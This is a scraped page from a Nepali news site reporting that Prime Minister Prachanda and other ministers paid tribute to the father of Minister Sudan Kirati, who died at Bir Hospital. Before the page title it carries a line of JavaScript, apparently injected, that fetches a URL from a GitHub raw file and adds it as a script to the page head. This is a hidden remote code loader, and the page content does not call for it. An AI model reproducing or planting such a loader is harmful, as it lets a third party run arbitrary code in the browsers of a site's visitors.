;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); मन्त्री किरातीका बुवालाई प्रधानमन्त्रीबाट श्रद्धाञ्जली – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • मन्त्री किरातीका बुवालाई प्रधानमन्त्रीबाट श्रद्धाञ्जली
Breaking News

मन्त्री किरातीका बुवालाई प्रधानमन्त्रीबाट श्रद्धाञ्जली

६ भदौं, काठमाडौं ।

प्रधानमन्त्री प्रचण्डसहित मन्त्रीहरूले सँस्कृति पर्यटन तथा नागरिक उड्डयनमन्त्री सुदन किराँतीका बुवालाई श्रद्धाञ्जली अर्पण गरेका छन् ।

मन्त्री निवास पुलचोक पुगेर प्रधानमन्त्री प्रचण्ड, उपप्रधान तथा रक्षामन्त्री पूर्णबहादुर खड्का, सञ्चारमन्त्री रेखा शर्मा, स्वास्थ्यमन्त्री मोहनबहादुर बस्नेत, भूमि सुधारमन्त्री रञ्जिता श्रेष्ठलगायतले श्रद्धाञ्जली अर्पण गरेका छन् ।

श्रद्धाञ्जलीपछि शवलाई हेलिकप्टरमार्फल गृहजिल्ला भोजपुर लैजाने तयारी छ । बुवाकै इच्छा अनुसार गाउँमै अन्त्येष्टि गर्न लागिएको मन्त्री किरातीको सचिवालयले जनाएको छ । तर, पानी परिरहेकोले शव गाउँ लैजान ढिला भइरहेको छ ।

मन्त्री किरातीका बुवा हर्कबहादुर राईको आज बिहान काठमाडौंको वीर अस्पतालमा उपचारका क्रममा निधन भएको हो ।

उनी लामो समयदेखि प्यारालाइसिस सम्बन्धी समस्याबाट पीडित थिए ।

    

फेसबुक प्रतिक्रियाहरु